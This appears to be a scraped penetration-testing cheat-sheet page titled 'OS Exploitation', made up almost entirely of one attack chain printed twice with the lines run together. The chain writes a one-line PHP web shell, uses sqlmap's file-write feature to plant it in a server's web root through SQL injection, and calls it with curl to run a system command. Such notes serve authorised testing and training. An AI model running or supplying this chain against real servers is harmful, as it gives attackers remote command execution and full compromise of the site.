OS Exploitation
echo '<?php system($_GET["cmd"]); ?>' > shell.phpsqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"curl http://www.example.com/shell.php?cmd=ls+-laLast updated
echo '<?php system($_GET["cmd"]); ?>' > shell.phpsqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"curl http://www.example.com/shell.php?cmd=ls+-laLast updated